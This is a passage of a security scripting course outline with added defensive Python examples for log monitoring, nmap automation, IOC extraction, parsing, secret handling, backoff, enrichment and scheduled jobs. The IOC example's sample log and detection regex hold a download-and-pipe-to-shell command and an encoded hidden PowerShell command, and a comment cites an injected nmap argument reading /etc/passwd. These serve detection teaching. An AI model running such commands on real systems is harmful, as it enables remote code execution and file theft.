Security Scripting
Automate security tasks with Python and Bash: scanning, log parsing, alerting, and response.
1. Python for Security Basics
Virtual environments (venv/virtualenv), the requests library, the json and argparse modules, and working with HTTP APIs.
3. Log Parsing and Alerting
Parse syslog and auth logs, detect anomalies such as repeated failed logins from one source, and send alerts to Slack or email.
4. Lab: Build a Log Monitor
Create a script that tails log files, matches patterns, and alerts when a threshold is crossed.
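As an added example for 3 and 4 (not part of the course materials): the core of the log monitor, a sliding-window brute-force detector run over constructed OpenSSH auth.log lines. The threshold, window and alert callback are assumptions; a live monitor would read the file incrementally instead of a string, but the detection logic is the same.

```python
"""Added example: sliding-window brute-force detector for OpenSSH auth.log lines.

Not the course's own code. The sample log lines are constructed for the
example; threshold and window are arbitrary defaults.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Classic syslog-style auth.log line from OpenSSH, e.g.
# "Mar 15 10:00:01 bastion sshd[1201]: Failed password for root from 203.0.113.7 port 51023 ssh2"
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_failed_login(line, year=2024):
    """Return (timestamp, user, source_ip) for a failed-login line, else None.

    syslog timestamps carry no year, so the caller supplies one (an assumption).
    """
    m = FAILED_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["user"], m["ip"]


class BruteForceDetector:
    """Alert once per source IP when it produces >= threshold failures within window_s seconds."""

    def __init__(self, threshold=5, window_s=60, alert=print):
        self.threshold = threshold
        self.window_s = window_s
        self.alert = alert                    # callable taking the alert text (Slack/e-mail in production)
        self.failures = defaultdict(deque)    # ip -> timestamps inside the current window
        self.alerted = set()

    def feed(self, line):
        """Consume one log line; return True if it triggered an alert."""
        parsed = parse_failed_login(line)
        if parsed is None:
            return False
        ts, user, ip = parsed
        window = self.failures[ip]
        window.append(ts)
        # Drop failures that fell out of the window (lines are assumed to arrive in time order).
        while window and (ts - window[0]).total_seconds() > self.window_s:
            window.popleft()
        if len(window) >= self.threshold and ip not in self.alerted:
            self.alerted.add(ip)
            self.alert(f"brute force from {ip}: {len(window)} failed logins within "
                       f"{self.window_s}s (latest user {user!r})")
            return True
        return False


def scan_log(text, threshold=5, window_s=60):
    """Run the detector over a whole log text and return the alerts it produced."""
    alerts = []
    det = BruteForceDetector(threshold, window_s, alert=alerts.append)
    for line in text.splitlines():
        det.feed(line)
    return alerts


# Constructed sample: one attacker IP with five failures in 11 s, one benign login, one stray failure.
SAMPLE_AUTH_LOG = """\
Mar 15 10:00:01 bastion sshd[1201]: Failed password for invalid user admin from 203.0.113.7 port 51022 ssh2
Mar 15 10:00:03 bastion sshd[1202]: Failed password for root from 203.0.113.7 port 51023 ssh2
Mar 15 10:00:04 bastion sshd[1203]: Accepted publickey for alice from 198.51.100.2 port 44120 ssh2
Mar 15 10:00:06 bastion sshd[1204]: Failed password for invalid user test from 203.0.113.7 port 51024 ssh2
Mar 15 10:00:09 bastion sshd[1205]: Failed password for root from 203.0.113.7 port 51025 ssh2
Mar 15 10:00:12 bastion sshd[1206]: Failed password for invalid user oracle from 203.0.113.7 port 51026 ssh2
Mar 15 10:03:00 bastion sshd[1207]: Failed password for root from 198.51.100.9 port 40000 ssh2
"""

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_AUTH_LOG):
        print("ALERT:", alert)
```

The deque per IP keeps memory bounded to the window rather than the whole log, and the alerted set stops one attacker from paging you on every subsequent line; reset it (or expire entries) if the monitor runs for days.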
5. Network Scanning Automation
Automate nmap scans from a script (invoked without a shell, with validated targets), parse the XML output, and generate reports.
6. Lab: Automated Recon Tool
Build a recon script that collects host info and open ports.
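As an added example for 5 and lab 6 (not the course's own code): invoking nmap as an argv list rather than through a shell, refusing targets that look like options or shell syntax, and parsing the -oX XML output. The XML is a constructed sample in nmap's format; run_scan needs nmap installed, while parse_nmap_xml runs offline.

```python
"""Added example: drive nmap without a shell, validate targets, and parse its XML
output, for 5 (scanning automation) and lab 6 (recon tool).

Not the course's own code. The XML below is a constructed sample in nmap's -oX format;
the scan flags are ordinary nmap options, and run_scan needs nmap installed.
"""
import ipaddress
import re
import subprocess
import xml.etree.ElementTree as ET

_HOSTNAME_RE = re.compile(
    r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)
_PORTS_RE = re.compile(r"^[0-9,-]+$")


def validate_target(target):
    """Accept an IP, CIDR, or hostname; anything else (option-like strings, shell syntax) is refused."""
    try:
        ipaddress.ip_network(target, strict=False)
        return target
    except ValueError:
        pass
    if _HOSTNAME_RE.match(target):
        return target
    raise ValueError(f"refusing suspicious target {target!r}")


def build_nmap_cmd(targets, ports="1-1024"):
    """argv list: no shell=True, so no quoting problems, and XML on stdout for the parser."""
    if not _PORTS_RE.match(ports):
        raise ValueError(f"bad port spec {ports!r}")
    return ["nmap", "-sT", "-sV", "-Pn", "-p", ports, "-oX", "-", *map(validate_target, targets)]


def parse_nmap_xml(xml_text):
    """Hosts that are up, with their open ports and whatever -sV identified."""
    hosts = []
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = next((a.get("addr") for a in host.findall("address")
                     if a.get("addrtype") in ("ipv4", "ipv6")), None)
        name = host.find("hostnames/hostname")
        entry = {"addr": addr, "hostname": name.get("name") if name is not None else None, "open_ports": []}
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            entry["open_ports"].append({
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": svc.get("name") if svc is not None else None,
                "product": svc.get("product") if svc is not None else None,
                "version": svc.get("version") if svc is not None else None,
            })
        hosts.append(entry)
    return hosts


def run_scan(targets, ports="1-1024", runner=subprocess.run):
    """Run nmap and return parsed hosts; the timeout keeps a hung scan from hanging the job."""
    proc = runner(build_nmap_cmd(targets, ports), capture_output=True, text=True, timeout=3600, check=True)
    return parse_nmap_xml(proc.stdout)


# Constructed sample of nmap -oX output: one host up with two open ports, one host down.
SAMPLE_NMAP_XML = """\
<nmaprun scanner="nmap" args="nmap -sT -sV -Pn -p 1-1024 -oX - 10.0.0.5 10.0.0.6">
  <host><status state="up"/><address addr="10.0.0.5" addrtype="ipv4"/>
    <hostnames><hostname name="web01.lab.internal" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="8.9p1"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="nginx" version="1.24.0"/></port>
      <port protocol="tcp" portid="443"><state state="closed"/></port>
    </ports>
  </host>
  <host><status state="down"/><address addr="10.0.0.6" addrtype="ipv4"/></host>
</nmaprun>
"""

if __name__ == "__main__":
    for h in parse_nmap_xml(SAMPLE_NMAP_XML):
        print(h["addr"], h["hostname"], [p["port"] for p in h["open_ports"]])
```

Targets often come from a ticket or a form field; validating them before they reach argv is what stops "10.0.0.5 -iL /etc/passwd" or a trailing shell metacharacter from turning the recon tool into something else.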
7. API Integrations
Use the VirusTotal and Shodan APIs with rate limiting and error handling for timeouts, HTTP 429 and 5xx responses.
8. Assignment: Incident Helper
Build a script to enrich IOCs and summarize findings.
10. Python Data Structures for Security Automation
Use lists, dictionaries, sets, and tuples effectively for IOC handling and parsing workflows.
11. Regular Expressions for Threat Detection
Build regex patterns that detect suspicious indicators in logs precisely, anchoring and validating matches to reduce false positives.
12. Lab: Regex-Based IOC Detection
Write and test regex patterns for hashes, IPs, domains, and suspicious command patterns.
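As an added example for 11 and lab 12 (not the course's own code): bounded regexes for hashes, IPv4 addresses, domains and a few shell/PowerShell command shapes, followed by a validation pass (octet range via ipaddress, file extensions that look like TLDs) that the regexes alone cannot do cleanly. The log text and the small filter lists are constructed for the example.

```python
"""Added example: tight IOC regexes plus a validation pass.

Not the course's own code. Sample text is constructed; the filter lists are
small illustrative sets, not a complete allow/deny list.
"""
import ipaddress
import re

# Hex digests bounded so that a 64-char SHA-256 is not also reported as a 32/40-char prefix.
HEX_HASH_RE = re.compile(
    r"(?<![0-9a-fA-F])([0-9a-fA-F]{32}|[0-9a-fA-F]{40}|[0-9a-fA-F]{64})(?![0-9a-fA-F])"
)
# Dotted-quad shape only; the octet range is checked with ipaddress, which a regex does badly.
IPV4_RE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")
# RFC 1035-style labels with an alphabetic TLD; file names like update.exe are filtered afterwards.
DOMAIN_RE = re.compile(
    r"\b((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63})\b", re.IGNORECASE
)
# Command shapes worth alerting on: decoded or downloaded content piped into a shell,
# and PowerShell launched with an encoded command.
SUSPICIOUS_CMD_RE = re.compile(
    r"base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh\b"
    r"|powershell(?:\.exe)?[^\n]*?\s-(?:e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"
    r"|(?:curl|wget)\s+[^\n|]*\|\s*(?:ba)?sh\b",
    re.IGNORECASE,
)
FILE_EXT_NOT_TLD = {"exe", "dll", "txt", "log", "py", "sh", "ps1", "json", "csv", "zip"}


def classify_hash(digest):
    return {32: "md5", 40: "sha1", 64: "sha256"}[len(digest)]


def extract_iocs(text, public_only=True):
    """Return de-duplicated IOCs found in text, in order of first appearance.

    public_only drops private, loopback and other non-global IPv4 addresses (note that
    ipaddress also classifies the RFC 5737 documentation ranges as non-global).
    """
    found = {"hashes": [], "ips": [], "domains": [], "commands": []}
    seen = set()

    def add(kind, value):
        if (kind, value) not in seen:
            seen.add((kind, value))
            found[kind].append(value)

    for m in HEX_HASH_RE.finditer(text):
        digest = m.group(1).lower()
        add("hashes", (classify_hash(digest), digest))
    for m in IPV4_RE.finditer(text):
        try:
            ip = ipaddress.ip_address(m.group(1))   # rejects 999.1.1.1 and friends
        except ValueError:
            continue
        if public_only and not ip.is_global:
            continue
        add("ips", str(ip))
    for m in DOMAIN_RE.finditer(text):
        domain = m.group(1).lower()
        if domain.rsplit(".", 1)[-1] in FILE_EXT_NOT_TLD:
            continue
        add("domains", domain)
    for m in SUSPICIOUS_CMD_RE.finditer(text):
        add("commands", m.group(0))
    return found


# Constructed log excerpt: two hashes, a bogus IP, a file name that looks like a domain,
# a curl-pipe-to-shell and an encoded PowerShell command.
SAMPLE_LOG = """\
2024-03-15T10:01:00Z host=web01 msg="quarantined payload md5=d41d8cd98f00b204e9800998ecf8427e name=update.exe"
2024-03-15T10:01:02Z host=web01 src=203.0.113.7 dst=10.0.0.5 url=http://cdn.example-updates.net/a.sh
2024-03-15T10:01:03Z host=web01 cmd="curl -s http://cdn.example-updates.net/a.sh | sh"
2024-03-15T10:01:05Z host=web01 bogus=999.1.1.1 sha256=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
2024-03-15T10:01:07Z host=win01 cmd="powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"
"""

if __name__ == "__main__":
    for kind, values in extract_iocs(SAMPLE_LOG, public_only=False).items():
        print(kind, values)
```

The lookbehind/lookahead guards matter more than they look: without them the SHA-256 above is also reported as an MD5 (its first 32 hex characters) and a timestamp fragment can be read as an IP. Validation after matching is cheaper than trying to encode "octet <= 255" in the pattern.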
13. Parsing Structured and Unstructured Logs
Process JSON, CSV, and plain-text logs while handling malformed records safely.
14. Error Handling and Resilient Script Design
Design scripts with retries, timeouts, exception management, and safe fallback behavior.
15. Lab: Fault-Tolerant Parser Build
Implement a robust log parser that survives malformed data and outputs useful diagnostics.
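As an added example for 13 and lab 15 (not the course's own code): one parser front-end for JSON lines, CSV and syslog text. Each parser skips a malformed record, counts it, and records a diagnostic saying which line failed and why, so a single bad line never aborts the batch. All three sample logs are constructed and each contains deliberately broken records.

```python
"""Added example: one parser front-end for JSON-lines, CSV and syslog text that keeps
going past malformed records and reports what it dropped (topic 13 and lab 15).

Not the course's own code. All three sample logs are constructed, each with
deliberately broken records.
"""
import csv
import io
import json
import re
from dataclasses import dataclass, field

SYSLOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"(?P<proc>[^:\[ ]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$"
)


@dataclass
class ParseStats:
    ok: int = 0
    malformed: int = 0
    errors: list = field(default_factory=list)   # one human-readable diagnostic per bad record

    def reject(self, where, why):
        self.malformed += 1
        self.errors.append(f"{where}: {why}")


def parse_json_lines(text, stats):
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        try:
            rec = json.loads(line)              # JSONDecodeError is a ValueError
            if not isinstance(rec, dict):
                raise ValueError("top-level value is not an object")
        except ValueError as exc:
            stats.reject(f"json line {n}", exc)
            continue
        stats.ok += 1
        yield rec


def parse_csv(text, stats, required=("ts", "src_ip", "action")):
    reader = csv.DictReader(io.StringIO(text))
    for n, row in enumerate(reader, 2):         # line 1 is the header
        if None in row:                         # DictReader parks surplus fields under key None
            stats.reject(f"csv line {n}", "more fields than header columns")
            continue
        missing = [k for k in required if not row.get(k)]
        if missing:
            stats.reject(f"csv line {n}", f"missing {','.join(missing)}")
            continue
        stats.ok += 1
        yield row


def parse_syslog(text, stats):
    for n, line in enumerate(text.splitlines(), 1):
        m = SYSLOG_RE.match(line)
        if m is None:
            stats.reject(f"syslog line {n}", "unrecognised line format")
            continue
        stats.ok += 1
        yield m.groupdict()


PARSERS = {"json": parse_json_lines, "csv": parse_csv, "syslog": parse_syslog}


def parse_log(text, fmt):
    """Return (records, stats); never raises on bad input, only on an unknown format."""
    stats = ParseStats()
    records = list(PARSERS[fmt](text, stats))
    return records, stats


# Constructed samples: line 2 of the JSON is truncated, line 3 is an array; the CSV has an
# empty src_ip and a row with an extra column; the syslog has one unparseable line.
JSON_SAMPLE = """\
{"ts": "2024-03-15T10:00:00Z", "event": "login", "user": "alice", "src_ip": "198.51.100.2"}
{"ts": "2024-03-15T10:00:05Z", "event": "login", "user": "bob", "src_ip": "203.0.113.7"
["not", "an", "object"]
{"ts": "2024-03-15T10:00:09Z", "event": "logout", "user": "alice"}
"""
CSV_SAMPLE = """\
ts,src_ip,action
2024-03-15T10:00:00Z,198.51.100.2,allow
2024-03-15T10:00:01Z,,deny
2024-03-15T10:00:02Z,203.0.113.7,deny,extra-column
2024-03-15T10:00:03Z,203.0.113.7,deny
"""
SYSLOG_SAMPLE = """\
Mar 15 10:00:01 bastion sshd[1201]: Accepted publickey for alice from 198.51.100.2 port 44120 ssh2
garbage line with no structure
Mar 15 10:00:02 bastion CRON[1300]: (root) CMD (run-parts /etc/cron.hourly)
"""

if __name__ == "__main__":
    for fmt, sample in (("json", JSON_SAMPLE), ("csv", CSV_SAMPLE), ("syslog", SYSLOG_SAMPLE)):
        records, stats = parse_log(sample, fmt)
        print(fmt, "ok:", stats.ok, "malformed:", stats.malformed, stats.errors)
```

Emitting the malformed count alongside the records is what turns a silent data-loss bug into something a dashboard can alarm on: a parser that suddenly rejects 40% of lines usually means the upstream log format changed, not that the logs went quiet.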
16. Secure API Authentication Patterns
Handle API tokens and credentials securely: load them from the environment or a secret store, and keep them out of source code, URLs, and logs.
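As an added example for 16 (not the course's own code): reading the key from the environment and refusing to run without it, sending it as a header rather than a query parameter, and a logging filter that redacts both the known key and anything shaped like a bearer token before any handler sees the record. The header name x-apikey follows VirusTotal's v3 API; the environment variable name and the sample token values are assumptions.

```python
"""Added example: keeping an API key out of source, URLs and logs.

Not the course's own code. The header name x-apikey follows VirusTotal's v3 API;
the environment variable name and the sample token values are assumptions.
"""
import io
import logging
import os
import re

# Bearer tokens and key=value style secrets in free text; the capture group keeps the label.
_TOKEN_RE = re.compile(
    r"(?i)(authorization:\s*bearer\s+|x-apikey[:=]\s*|apikey=|token=)[A-Za-z0-9._~+/=-]{8,}"
)


def redact(text, secrets=()):
    """Replace known secret values and anything shaped like a token with a placeholder."""
    for s in secrets:
        if s:
            text = text.replace(s, "[REDACTED]")
    return _TOKEN_RE.sub(r"\1[REDACTED]", text)


class SecretRedactor(logging.Filter):
    """Logging filter that rewrites every record before any handler formats it."""

    def __init__(self, secrets=()):
        super().__init__()
        self.secrets = tuple(secrets)

    def filter(self, record):
        record.msg = redact(record.getMessage(), self.secrets)
        record.args = ()          # already interpolated; prevents a second % formatting pass
        return True


def load_api_key(env_var="VT_API_KEY", environ=None):
    """Read the key from the environment (populated by a secret store or CI vault), never from code."""
    environ = os.environ if environ is None else environ
    key = environ.get(env_var, "").strip()
    if not key:
        raise RuntimeError(f"{env_var} is not set; export it from your secret store instead of hard-coding it")
    return key


def build_headers(api_key):
    """Send the key as a header. Query-string keys end up in proxy logs, history and Referer headers."""
    return {"x-apikey": api_key, "User-Agent": "ioc-enricher/1.0"}


def demo(api_key):
    """Log two lines that would leak secrets without the filter; return what the handler wrote."""
    buf = io.StringIO()
    log = logging.getLogger("enricher")
    log.handlers.clear()
    log.filters.clear()
    log.propagate = False
    log.setLevel(logging.INFO)
    log.addHandler(logging.StreamHandler(buf))
    log.addFilter(SecretRedactor([api_key]))
    log.info("request headers=%s", build_headers(api_key))
    log.info("retrying: curl -H 'Authorization: Bearer %s' https://api.example.test/v3/files",
             "eyJhbGciOi.fake.token-value")
    return buf.getvalue()


if __name__ == "__main__":
    print(demo(load_api_key(environ={"VT_API_KEY": "k9f3EXAMPLEsecret0123456789"})), end="")
```

The filter is attached to the logger, so it runs before every handler (file, syslog, Slack) and covers debug output of request objects too. It is a backstop, not a substitute for never formatting the key into a message in the first place.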
17. Rate Limiting and Backoff Strategies
Implement request throttling and backoff logic to build stable integrations with external APIs.
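As an added example for 14 (retries, timeouts, fallbacks) and 17 (throttling and backoff), not the course's own code: a retry loop with capped exponential backoff and full jitter that honours Retry-After and refuses to retry permanent 4xx errors, plus a token-bucket throttle for the client side. The fake endpoint and its scripted responses are constructed; clock, sleep and the random source are injectable so the run is deterministic.

```python
"""Added example: retry with capped exponential backoff and full jitter, plus a
token-bucket throttle, for the error-handling (14) and rate-limiting (17) topics.

Not the course's own code. The fake endpoint and its response script are constructed;
clock/sleep/rng are injectable so the behaviour is deterministic under test.
"""
import random
import time


class RetryableError(Exception):
    """Transient failure: worth another attempt after a delay."""


class RateLimited(RetryableError):
    def __init__(self, retry_after=None):
        super().__init__("HTTP 429")
        self.retry_after = retry_after    # seconds, if the server told us


class FatalError(Exception):
    """Permanent failure (bad key, unknown resource): retrying only burns quota."""


def classify_http(status, headers):
    """Translate an HTTP status into retry semantics; call this on every response."""
    if status == 429:
        ra = headers.get("Retry-After")
        raise RateLimited(float(ra) if ra else None)
    if 500 <= status < 600:
        raise RetryableError(f"HTTP {status}")
    if status >= 400:
        raise FatalError(f"HTTP {status}")


def with_retries(fn, *, attempts=5, base=0.5, cap=30.0, sleep=time.sleep, rng=random.random):
    """Call fn() until it succeeds or attempts are exhausted.

    Delay before attempt n+1 is Retry-After when given, else uniform(0, min(cap, base*2**n)).
    fn should set its own socket timeout (e.g. requests' timeout=) and raise RetryableError
    for timeouts and 5xx, FatalError for 4xx other than 429.
    """
    for n in range(attempts):
        try:
            return fn()
        except RetryableError as exc:
            if n == attempts - 1:
                raise
            delay = getattr(exc, "retry_after", None)
            if delay is None:
                delay = min(cap, base * 2 ** n) * rng()
            sleep(delay)


class TokenBucket:
    """Client-side throttle: `rate` requests per second sustained, bursts up to `capacity`."""

    def __init__(self, rate, capacity, clock=time.monotonic, sleep=time.sleep):
        self.rate, self.capacity = rate, capacity
        self.tokens = float(capacity)
        self.clock, self.sleep = clock, sleep
        self.updated = clock()

    def acquire(self):
        """Block until a token is available; return how long we waited."""
        now = self.clock()
        self.tokens = min(self.capacity, self.tokens + (now - self.updated) * self.rate)
        self.updated = now
        if self.tokens >= 1:
            self.tokens -= 1
            return 0.0
        wait = (1 - self.tokens) / self.rate
        self.sleep(wait)
        self.updated = self.clock()
        self.tokens = 0.0              # the token that accrued during the wait is consumed here
        return wait


def make_flaky_api(script):
    """Constructed stand-in for a real endpoint: each call yields the next (status, headers, body)."""
    responses = iter(script)

    def call():
        status, headers, body = next(responses)
        classify_http(status, headers)
        return body
    return call


def demo():
    """503, then 429 with Retry-After: 2, then success; returns (body, delays slept)."""
    slept = []
    api = make_flaky_api([(503, {}, None), (429, {"Retry-After": "2"}, None), (200, {}, {"malicious": 3})])
    body = with_retries(api, sleep=slept.append, rng=lambda: 0.5)
    return body, slept


def demo_bucket():
    """Fake clock: capacity 2 at 2 req/s, so the third immediate call has to wait 0.5 s."""
    t = [0.0]
    waits = []

    def fake_sleep(s):
        waits.append(s)
        t[0] += s
    bucket = TokenBucket(rate=2, capacity=2, clock=lambda: t[0], sleep=fake_sleep)
    return [bucket.acquire() for _ in range(3)], waits
```

Two design points: full jitter (a random fraction of the capped delay) spreads out a fleet of scripts that all got rate-limited at the same second, and treating 401/403/404 as fatal stops a bad key from being retried five times against a quota-limited API.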
18. Lab: API Enrichment Pipeline
Build a pipeline that enriches indicators using an API and stores structured results.
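As an added example for assignment 8 and lab 18 (not the course's own code): an enrichment pipeline that de-duplicates indicators, consults a TTL cache in SQLite before calling the provider, records provider failures on the output row instead of aborting the batch, and returns structured records. The threat-intel provider is a constructed fake; a real run would wrap a VirusTotal or Shodan client with the retry and throttling logic from 17.

```python
"""Added example: an enrichment pipeline with de-duplication, a TTL cache in SQLite,
and structured output, for assignment 8 and lab 18.

Not the course's own code. The threat-intel provider is a constructed fake; a real
run would wrap a VirusTotal/Shodan client with retry and throttling.
"""
import json
import sqlite3
import time

SCHEMA = """
CREATE TABLE IF NOT EXISTS enrichment (
    ioc_type   TEXT NOT NULL,
    ioc        TEXT NOT NULL,
    source     TEXT NOT NULL,
    fetched_at REAL NOT NULL,
    result     TEXT NOT NULL,
    PRIMARY KEY (ioc_type, ioc, source)
)
"""


class EnrichmentStore:
    """Cache of provider answers keyed by (type, value, source); entries expire after ttl_s."""

    def __init__(self, path=":memory:", ttl_s=24 * 3600, clock=time.time):
        self.db = sqlite3.connect(path)
        self.db.execute(SCHEMA)
        self.ttl_s, self.clock = ttl_s, clock

    def get(self, ioc_type, ioc, source):
        row = self.db.execute(
            "SELECT fetched_at, result FROM enrichment WHERE ioc_type=? AND ioc=? AND source=?",
            (ioc_type, ioc, source),
        ).fetchone()
        if row is None or self.clock() - row[0] > self.ttl_s:
            return None
        return json.loads(row[1])

    def put(self, ioc_type, ioc, source, result):
        self.db.execute(
            "INSERT OR REPLACE INTO enrichment VALUES (?, ?, ?, ?, ?)",
            (ioc_type, ioc, source, self.clock(), json.dumps(result)),
        )
        self.db.commit()


def enrich(iocs, lookup, store, source="fake-ti"):
    """Enrich (type, value) pairs; return (records, provider_calls).

    Duplicates are collapsed, cache hits skip the provider, and a provider failure is
    recorded on the output row rather than cached or allowed to abort the batch.
    """
    records, calls = [], 0
    for ioc_type, value in dict.fromkeys(iocs):      # de-duplicate, keep first-seen order
        data = store.get(ioc_type, value, source)
        cached = data is not None
        if not cached:
            calls += 1
            try:
                data = lookup(ioc_type, value)
            except Exception as exc:
                records.append({"type": ioc_type, "value": value, "source": source,
                                "cached": False, "error": f"{type(exc).__name__}: {exc}"})
                continue
            store.put(ioc_type, value, source, data)
        records.append({"type": ioc_type, "value": value, "source": source,
                        "cached": cached, "data": data})
    return records, calls


# Constructed provider answers; anything else is "unknown".
FAKE_TI = {
    ("ip", "203.0.113.7"): {"malicious": True, "tags": ["ssh-bruteforce"]},
    ("sha256", "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"): {"malicious": False, "tags": []},
}


def fake_lookup(ioc_type, value):
    if ioc_type == "domain" and value.endswith(".invalid"):
        raise ConnectionError("provider timeout")    # simulated transport failure
    return FAKE_TI.get((ioc_type, value), {"malicious": None, "tags": [], "note": "unknown to provider"})


def demo(store=None):
    """Run the same batch twice against one store: the second pass should hit the cache."""
    store = store or EnrichmentStore()
    iocs = [("ip", "203.0.113.7"), ("ip", "203.0.113.7"),
            ("domain", "cdn.example-updates.net"), ("domain", "broken.invalid")]
    first = enrich(iocs, fake_lookup, store)
    second = enrich(iocs, fake_lookup, store)
    return first, second
```

Keying the cache on the source as well as the indicator lets you add a second provider without invalidating the first; the TTL keeps a verdict from outliving the provider's own reclassification.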
19. Automation with Cron and Schedulers
Run scripts on a schedule with proper logging, health checks (heartbeats), locking against overlapping runs, and failure alerts.
20. Secure Script Packaging and Deployment
Package scripts with configs, environment variables, and secure defaults for repeatable operations.
21. Lab: Scheduled Security Jobs
Configure recurring security scripts with logs, notifications, and rollback planning.
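As an added example for 19 and lab 21 (not the course's own code): a wrapper that makes a cron-driven script safe to schedule. It takes a lock so two runs cannot overlap, writes an atomically-replaced heartbeat file that a monitor can check, logs per job, and calls an alert hook on failure. It uses fcntl, so it is Unix only; the crontab line in the comment uses hypothetical paths, and demo() runs in a scratch directory.

```python
"""Added example: a wrapper that makes a cron-driven script safe to schedule, for 19
(schedulers) and lab 21 (scheduled security jobs): one run at a time via a lock file,
a heartbeat file for health checks, a log per job, and an alert hook on failure.

Not the course's own code. Uses fcntl, so Unix only; paths in the crontab comment are
hypothetical, and demo() runs in a scratch directory.
"""
import fcntl
import json
import logging
import os
import tempfile
import time
import traceback
from pathlib import Path

# Hypothetical crontab entry: every 15 minutes, with stray output captured rather than mailed.
# */15 * * * *  /opt/secjobs/venv/bin/python /opt/secjobs/run.py ioc-enrich >> /var/log/secjobs/cron.log 2>&1


def run_job(name, job, workdir, alert, clock=time.time):
    """Run job() once; return the heartbeat dict (status: ok, failed, or skipped)."""
    workdir = Path(workdir)
    workdir.mkdir(parents=True, exist_ok=True)
    log = logging.getLogger(f"jobs.{name}")
    if not log.handlers:
        handler = logging.FileHandler(workdir / f"{name}.log")
        handler.setFormatter(logging.Formatter("%(asctime)s %(levelname)s %(message)s"))
        log.addHandler(handler)
        log.setLevel(logging.INFO)
    heartbeat_path = workdir / f"{name}.heartbeat.json"
    with open(workdir / f"{name}.lock", "w") as lock:
        try:
            fcntl.flock(lock, fcntl.LOCK_EX | fcntl.LOCK_NB)   # released when the file closes
        except BlockingIOError:
            log.warning("previous run still active, skipping this one")
            return {"job": name, "status": "skipped", "finished": clock()}
        started = clock()
        hb = {"job": name, "status": "ok", "started": started}
        try:
            hb["result"] = job()
        except Exception as exc:     # a crash must still leave a heartbeat and an alert behind
            hb["status"] = "failed"
            hb["error"] = f"{type(exc).__name__}: {exc}"
            log.error("job failed\n%s", traceback.format_exc())
            alert(f"[{name}] failed: {hb['error']}")
        hb["finished"] = clock()
        tmp = heartbeat_path.with_suffix(".tmp")
        tmp.write_text(json.dumps(hb))
        os.replace(tmp, heartbeat_path)       # atomic: a reader never sees a half-written file
        log.info("status=%s duration=%.2fs", hb["status"], hb["finished"] - started)
    return hb


def is_stale(workdir, name, max_age_s, clock=time.time):
    """Health check for a monitor: True if the last run is missing, failed, or too old."""
    path = Path(workdir) / f"{name}.heartbeat.json"
    if not path.exists():
        return True
    hb = json.loads(path.read_text())
    return hb.get("status") != "ok" or clock() - hb["finished"] > max_age_s


def demo(workdir=None):
    """One successful and one failing run in a scratch directory."""
    workdir = workdir or tempfile.mkdtemp(prefix="secjobs-")
    alerts = []
    ok = run_job("demo", lambda: {"hosts_scanned": 3}, workdir, alerts.append)
    healthy = not is_stale(workdir, "demo", max_age_s=900)
    failed = run_job("demo", lambda: 1 / 0, workdir, alerts.append)
    return ok, healthy, failed, alerts, is_stale(workdir, "demo", max_age_s=900)
```

The heartbeat is the part that catches the failure cron cannot tell you about: a job that never starts. A monitor that calls is_stale with max_age_s somewhat larger than the schedule interval alarms on missing runs as well as failed ones.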
22. Report Generation and Analyst Output
Generate security reports that are both machine-readable (JSON/CSV) and human-readable (Markdown) from script output data.
23. Lab: Build Security Dashboard Feed
Transform script outputs into structured summaries for SOC consumption.
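As an added example for 22 and lab 23 (not the course's own code): one summary object built from a list of findings, rendered three ways: JSON for a dashboard feed, CSV for a SIEM import, and a Markdown table for an analyst. FINDINGS is a constructed stand-in for the output of the enrichment stage, and the severity scale is an assumption.

```python
"""Added example: one summary object rendered as JSON, CSV and Markdown, for 22
(report generation) and lab 23 (dashboard feed).

Not the course's own code. FINDINGS is a constructed stand-in for the enrichment
stage's output; the severity scale is an assumption.
"""
import csv
import io
import json
from collections import Counter

SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2, "low": 3, "info": 4}

FINDINGS = [
    {"type": "ip", "value": "203.0.113.7", "severity": "high", "host": "bastion",
     "detail": "5 SSH failures in 11s; TI tag ssh-bruteforce"},
    {"type": "sha256", "value": "e3b0c442...7852b855", "severity": "info", "host": "web01",
     "detail": "hash of an empty file, benign"},
    {"type": "command", "value": "curl ... | sh", "severity": "critical", "host": "web01",
     "detail": "remote script piped into a shell"},
    {"type": "domain", "value": "cdn.example-updates.net", "severity": "medium", "host": "web01",
     "detail": "unknown to provider"},
]


def summarize(findings, generated_at):
    """Machine-readable summary: totals, per-severity counts, busiest hosts, findings by severity."""
    ordered = sorted(findings, key=lambda f: (SEVERITY_ORDER.get(f["severity"], 99), f["host"], f["value"]))
    by_sev = Counter(f["severity"] for f in findings)
    return {
        "generated_at": generated_at,
        "total": len(findings),
        "by_severity": {s: by_sev[s] for s in SEVERITY_ORDER if by_sev[s]},
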